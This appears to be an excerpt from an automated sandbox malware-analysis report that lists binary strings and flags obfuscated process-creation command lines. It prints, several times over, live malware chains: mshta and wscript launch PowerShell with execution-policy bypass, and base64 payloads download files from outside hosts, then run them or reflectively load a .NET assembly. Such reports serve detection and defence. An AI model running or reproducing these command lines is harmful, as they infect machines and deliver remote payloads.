ixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotjojndnlib.dotnet.pdbsymbolreadercreatorjmjldnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerjkjjdnlib.dotnet.mdimagecor20headerjidnlib.dotnet.mdirawrowjhdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.
Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.2535929007.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.pdb source: powershell.exe, 00000003.00000002.2228926984.0000000004B67000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2534836877.0000000006790000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: TenantRestrictions\Payload\Local\Temp\zl2mzrqp\zl2mzrqp.pdb source: powershell.exe, 00000003.00000002.2236379284.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2537047764.0000000006C1A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.2501733594.000000000537E000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"	Jump to behavior

Suspicious command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"			Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))